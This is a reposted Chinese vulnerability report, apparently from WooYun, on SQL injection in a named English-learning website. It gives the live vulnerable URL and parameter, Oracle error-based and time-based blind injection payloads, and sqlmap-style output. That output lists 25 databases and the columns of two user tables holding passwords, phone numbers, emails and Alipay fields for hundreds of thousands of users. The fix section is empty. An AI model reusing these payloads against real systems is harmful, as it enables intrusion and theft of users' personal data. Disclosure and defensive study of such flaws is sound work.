记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

笔头网SQL注入漏洞(涉及近40w用户)

2016-01-04 22:00

http://denglish.e21.cn/diag/user_myclazz.do;jsessionid=D34619F852B1EF15E0EB4890AA68A335?pageNum=1&pageRows=5&grade=0&bjtype=common

grade参数存在注入

code 区域
Parameter: grade (GET)

Type: error-based

Title: Oracle AND error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)

Payload: pageNum=1&pageRows=5&grade=0') AND 8844=CTXSYS.DRITHSX.SN(8844,(CHR(113)||CHR(107)||CHR(113)||CHR(106)||CHR(113)||(SELECT (CASE WHEN (8844=8844) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(122)||CHR(98)||CHR(113))) AND ('ibJw'='ibJw&bjtype=common



Type: AND/OR time-based blind

Title: Oracle AND time-based blind (heavy query)

Payload: pageNum=1&pageRows=5&grade=0') AND 2118=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND ('eRHT'='eRHT&bjtype=common

---

web application technology: JSP

back-end DBMS: Oracle

available databases [25]:

[*] APEX_030200

[*] APPQOSSYS

[*] BITOU

[*] CMS

[*] CTXSYS

[*] DBSNMP

[*] DENGLISH

[*] DENGLISH3

[*] EBOOK

[*] EBOOK1

[*] EXFSYS

[*] FLOWS_030000

[*] FLOWS_FILES

[*] MDSYS

[*] NEW007

[*] OLAPSYS

[*] ORDDATA

[*] ORDSYS

[*] OUTLN

[*] SCOTT

[*] SYS

[*] SYSMAN

[*] SYSTEM

[*] WMSYS

[*] XDB

漏洞证明:

code 区域
back-end DBMS: Oracle

Database: NEW007

+--------+---------+

| Table | Entries |

+--------+---------+

| T_USER | 126975 |

+--------+---------+

Database: NEW007

Table: T_USER

[32 columns]

+--------------+----------+

| Column | Type |

+--------------+----------+

| ADDRESS | VARCHAR2 |

| AMOUNT | NUMBER |

| CARD_POINT | NUMBER |

| CREDIT | NUMBER |

| CRT_DATE | DATE |

| CURRENT_HOST | VARCHAR2 |

| EMAIL | VARCHAR2 |

| GENDER | VARCHAR2 |

| GRADE | VARCHAR2 |

| GRADE_ID | NUMBER |

| IMAGE | VARCHAR2 |

| INTRODUCE | VARCHAR2 |

| LAST_TIME | DATE |

| LOGIN_COUT | NUMBER |

| LOGIN_NAME | VARCHAR2 |

| MSN | VARCHAR2 |

| NOTE | VARCHAR2 |

| PASSWD | VARCHAR2 |

| PHONE | VARCHAR2 |

| PHONE_CHECK | VARCHAR2 |

| PRIVILEGE | VARCHAR2 |

| QQ | VARCHAR2 |

| QQ_OPENID | VARCHAR2 |

| REGION_ID | NUMBER |

| ROLE_ID | NUMBER |

| RRUID | VARCHAR2 |

| SCHOOL_NAME | VARCHAR2 |

| SINA_UID | VARCHAR2 |

| STATUS | VARCHAR2 |

| USER_ID | NUMBER |

| USER_NAME | VARCHAR2 |

| USER_TYPE | VARCHAR2 |

+--------------+----------+

b1.png



http://www.penglish.cn/ 笔头网--英语只能学习平台共256217个会员

code 区域
back-end DBMS: Oracle

Database: BITOU

+--------+---------+

| Table | Entries |

+--------+---------+

| T_USER | 256217 |

+--------+---------+

Database: BITOU

Table: T_USER

[51 columns]

+-----------------+----------+

| Column | Type |

+-----------------+----------+

| ADDRESS | VARCHAR2 |

| ALIPAY | VARCHAR2 |

| AMOUNT | NUMBER |

| BIRTHDAY | VARCHAR2 |

| BLOG_URL | VARCHAR2 |

| CARD_POINT | NUMBER |

| CET_TYPE | NUMBER |

| CHANNEL_ID | NUMBER |

| CREDIT | NUMBER |

| CRT_DATE | DATE |

| CRT_OP | VARCHAR2 |

| CURRENT_DEV | VARCHAR2 |

| CURRENT_HOST | VARCHAR2 |

| DS_PRODUCT_ID | NUMBER |

| EMAIL | VARCHAR2 |

| EXP | NUMBER |

| GENDER | VARCHAR2 |

| GRADE | VARCHAR2 |

| GRADE_ID | NUMBER |

| ID_VALIDATION | VARCHAR2 |

| IMAGE | VARCHAR2 |

| INTRODUCE | VARCHAR2 |

| KY_USE_DAYS | NUMBER |

| LAST_TIME | DATE |

| LOGIN_COUT | NUMBER |

| LOGIN_NAME | VARCHAR2 |

| MSN | VARCHAR2 |

| NAME | VARCHAR2 |

| NOTE | VARCHAR2 |

| ORG_ID | NUMBER |

| PARENT_PASSWORD | VARCHAR2 |

| PASSWD | VARCHAR2 |

| PHONE | VARCHAR2 |

| PRIVILEGE | VARCHAR2 |

| PROMOTE_ID | NUMBER |

| PROMOTER_LINK | VARCHAR2 |

| QQ | VARCHAR2 |

| REG_FROM | NUMBER |

| REG_HOST | VARCHAR2 |

| REGION_ID | NUMBER |

| SCHOOL | VARCHAR2 |

| STATUS | VARCHAR2 |

| THIRD_TYPE | VARCHAR2 |

| THIRD_UID | VARCHAR2 |

| USE_DAYS | NUMBER |

| USE_TIME | DATE |

| USER_ID | NUMBER |

| USER_NAME | VARCHAR2 |

| USER_TYPE | VARCHAR2 |

| VALID_DAYS | NUMBER |

| WX_ID | VARCHAR2 |

+-----------------+----------

b4.png



b3.png

修复方案:

知识来源: www.wooyun.org/bugs/wooyun-2016-0157774

阅读:172317 | 评论:0 | 标签:注入 漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“笔头网SQL注入漏洞(涉及近40w用户)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

学习黑客技术,传播黑客文化

推广

工具

标签云

本页关键词